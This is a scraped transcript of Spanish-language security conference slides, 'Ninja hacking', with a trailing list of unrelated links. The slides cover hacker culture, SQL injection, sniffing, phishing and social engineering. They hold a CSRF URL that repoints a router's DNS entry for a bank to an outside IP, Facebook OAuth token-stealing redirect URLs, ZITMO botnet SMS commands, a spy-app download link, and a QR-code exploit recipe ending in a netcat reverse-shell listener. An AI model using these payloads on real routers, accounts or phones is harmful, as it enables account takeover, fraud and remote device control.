Ninja hacking

Ninja~HackingNinja~HackingVII Congreso de Ciencias ExactasVII Congreso de Ciencias Exactas

Rafael Bucio.Rafael Bucio.Rafael@Bucio.com.mx@Bucio

Esta platica es...Con fines educativos.

✔ Cultura ✔ Samurai & Ninja Ninjutsu 忍術✔ Estrategia / formas de engaño (Bo Ryaku)

✔ Suplantación e Infiltración (Inton Jutsu)

✔ Ocultación y Camuflaje (Shinobi Iri)

✔ Espionaje (Cho Ho)

✔ Stuff

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ []~$ []

✔ Cultura

HACKER:

En el mundo de la informática, un hacker es una persona que entra de forma no autorizada a computadoras y redes de computadoras. Su motivación varía de acuerdo a su ideología: fines de lucro, como una forma de protesta o simplemente por la satisfacción de lograrlo.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Cultura.~$ Cultura.

WHITE HAT BLACK HAT

CrackerPhreakerCarder

Lammer Script-kiddieNewbie (n00b)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Cultura.~$ Cultura.

✔ Samurai & Ninja

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Samurai & Ninja.~$ Samurai & Ninja.

✔ Estrategia / formas de engaño(Bo Ryaku)

Fin común:

✔Obtener Información / Obstruir información

Escenarios:

✔Internet✔Redes Locales

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Estrategia / formas de engaño (Bo Ryaku)~$ Estrategia / formas de engaño (Bo Ryaku)

Escenario: Internet

Tácticas:

✔Injection *SQL✔Auth, Session Management✔XSS✔Sensitive Data Exposure✔Using Components with Known Vulnerabilities

Escenario: Locales

Tácticas:

✔ Sniffing✔ DNS Poisoning/modem✔ MITM ~ (man-in-the-middle)

¿Ingeniería Social?

QR con Premio

Es el uso de influencia y persuasión sobre una(s) persona(s) para engañarla(s) y obtener información

confidencial o sensible para fines maliciosos!

Ingeniería social básica. #win

Ingeniería social a jaquers. #EPICwin

✔ Suplantación e Infiltración (Inton Jutsu)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Suplantación e Infiltración ~$ Suplantación e Infiltración (Inton Jutsu)(Inton Jutsu)

Escenarios:

➔Internet

Escenarios:

➔Internet

Paginas Web.Redes Sociales.

Fin común / TARGET* | Obtener Acceso completo al servidor

Ejemplo: Secretaria de Gobierno Quintana Roo 2005/2011

/*Tiempo 20 min*/

http://segob.qroo.gob.mx/

Kernel -> exploit -> root Backdoor ( /tmp -> Escuchar obtener Root)

Injection SQL

Es una vulnerabilidad de las Web, que afectan directamente a las bases de datos de una aplicación, El problema radica al filtrar erróneamente las variables utilizadas en parte de la

página con código SQL.

✔ Ocultación y Camuflaje (Shinobi Iri)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Ocultación y Camuflaje (Shinobi Iri)~$ Ocultación y Camuflaje (Shinobi Iri)

Escenarios:

➔Redes Locales

Escenarios:

➔Redes Locales

✔ Sniffing.

✔ Phishing.

✔ Pharming.

✔ Robo de identidad.

✗Jugar al espia.. con tú novi@.

Cross Site Request ForgeryModifica la configuración del dispositivo usando una petición GET

http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95

Escenarios:

➔Redes Locales

El caso de el jefe de seguridad en Facebok:

“Los empleados que lograron hackear al ingeniero de SRE (Site Reliability Engineering) se ubicaron sigilosamente cerca de su domicilio particular, y conectaron un router inalámbrico que se identificó con el mismo SSID de la red casera de la víctima.”

✔ Espionaje(Cho Ho)

OBTNER INFORMACIÓN.

Facebook OAuth

(the bug is closed now.)12.marzo.2013

redirect_ur i= http://www.touch.facebook.com/#/x/#/l.php?u=http://facebook.com/l.php?u=BAD_URL&h=3AQHlSR7f

http://touch.facebook.com/l.php?u=http://facebook.com/l.php?u=BAD_URL&h=3AQHlSR7f/#access_token=ACCESS TOKEN

Facebook OAuth bug (xd_arbiter.php)

12.ABRIL.2013this bug was closed by Facebook Security Team

http://static.ak.facebook.com/connect/xd_arbiter.php?version=21#channel=f876ddf24&origin=http://localhost&chan

nel_path=/oauth/PoC_js/?fb_xd_fragment#xd_sig=f3adf0e04c&”

→ https://developers.facebook.com/docs/reference/javascript/

http://facebook.com/connect/xd_arbiter.php?#&origin=http://facebook.com/&#8221

http://facebook.com/connect/xd_arbiter.php?#!/l.php?u=http://facebook.com/l.php?

u=http://localhost/oauth/boom.php?&h=WAQGoSQT6&origin=http://facebook.com/

VER VIDEOpwn_fb_2.ogv.

http://touch.facebook.com/connect/xd_arbiter.php?

#!/apps/APPmalvada/?&origin=http:// facebook.com/

Da e l t o ke n y p e rm i s os d e c ua l q u i e r c u enta en fac ebo o k q u e d e c l i c k .

$12,500 USD

$20,000 USD

1)Cambiar Value por el profile_id de la victima. 2)Enviar F al 32665 y recibes un codigo de 8 caracters.3)Ingresas el codigo pwn pwn

Android como herramienta para espiar.

Proyecto off.http://works.bucio.com.mx/apk/ds.apk

VIDEOds.ogg

Botnets zitmozitmo

Controlar el dispositivo a través de mensajes de texto permite a los cibercriminales vulnerar los sistemas de doble autenticación de una manera sencilla. Manteniéndose ocultos en dentro de los sistemas del usuario, ya sea en los equipos de escritorio o los dispositivos móviles logran realizar las transferencias bancarias de una manera sigilosa y sin alertar al usuario.

#: Es el comando inicial que le permite al atacante conocer si el dispositivo está infectado o no.

/: Permite definir a qué número de teléfono se van a enviar los mensajes que reciba el dispositivo de la víctima.

!: Desactiva y deshabilita la ejecución de ZITMO en el teléfono con Android.

,: Finaliza la secuencia de comandos y vuelve a activar la recepción de mensajes en el dispositivo móvil de la víctima.

Ejemplo.

HELLCELHELLCEL

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ ^C~$ ^C

Sniffing

"Dios mío, Apple me ha expulsado del desarrollo del programa de iOS,

¡qué grosero!" Charlie Miller

El desarrollador había creado una aplicación de seguimiento de valores bursátiles llamado IntaStock.

Esta app incluía en sus códigos un malware que permitía al hacker (en este caso, el

mismo Charlie Miller) descargar información de los terminales, tales como fotografías, datos y contactos.

V i d eo i p h o ne . o g v

The Jester Style.

RECETA:

*QR-CODE *URL [host]

*JS-ENCODER*netcat http://scriptasylum.com/tutorials/encode-decode.html

QR-Codes <- android o IOS 99%

UTF JS codificado dentro del HTML

PAGINA.HTML shellcode executed→

Remote Code Execution CVE-2010-1807,

QR-Codes android o IOS 99%←→

UTF JS codificado dentro del HTML

PAGINA.HTML → shellcode executed

WebKit[dispositivo] → Reverse TCP shell connection to a ‘remote server’ port 37337

nc -v -l -p 37337 ....

ZoAuthoAuth

$> stuff.

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Stuff~$ Stuff

Certified Cyber Security Ninja (CCSN)

VII Congreso de Ciencias Exactas. Ninja~Hacking~$ Stuff~$ Stuff

6r4c145

IM: IM: rafael@bucio.com.mxrafael@bucio.com.mx

Twitter: @BucioTwitter: @Bucio

Ninja hacking

Internet

Transcript of Ninja hacking

Ninja JX-Engine instruction manual - Ninja-Engine

Hacking health-camp - Hacking Health

Cocktail Ninja

Ethical Hacking: Hacking GMail. Teaching Hacking.

Ninja Skills: The Authentic Ninja Training Manual

ninja book

Fanotec Spherical Panoramic Tripod Head Nodal Ninja 4store.kolor.com/media/pages/products/nodal-ninja/Nodal-Ninja-4/... · Fanotec ® Spherical Panoramic Tripod Head ... Nodal Ninja

Hacking / Hacking Exposed 6: Network Security Secrets & …cdn.ttgtmedia.com/searchMidmarketSecurity/downloads/Hacking... · 153 Hacking / Hacking Exposed 6: Network Security Secrets

Hacking Wireless World, RFID hacking

Ninja Marketing

ATOMOS NINJA INFERNOdownloads.atomos.com/ninja-inferno/ninja-inferno-user-manual.pdf · *Subject to change without notice Atomos Ninja Inferno – User Manual Edition 1: May 2017

NINJA ASSASSIN PRODUCT INFO SHEET - Atomosdownloads.atomos.com/ninja-assassin/ninja-assassin-product-info-sheet.pdf · NINJA ASSASSIN PRODUCT INFO SHEET - UPDATED SEPTEMBER 2015 ANAMORPHIC

Ninja Shisen

Ninja Hacking

BlackHat Hacking - Hacking VoIP.

# !@ Ethical Hacking. 2 # !@ Ethical Hacking - ? Why – Ethical Hacking ? Ethical Hacking - Process Ethical Hacking – Commandments Reporting.

Ninja soccer

ToRTuGAS NINjA TEENAGE MuTANT NINjA TuRTLES - lan. · PDF fileToRTuGAS NINjA TEENAGE MuTANT NINjA TuRTLES Un experimento peligroso ... CinE ARTE inDEPEnDEnT CLáSiCOS CLASSiCS DOCuMEnTALES

Hacking and Anti Hacking

Ninja Gaiden II - Team Ninja Studio Tour (Feature)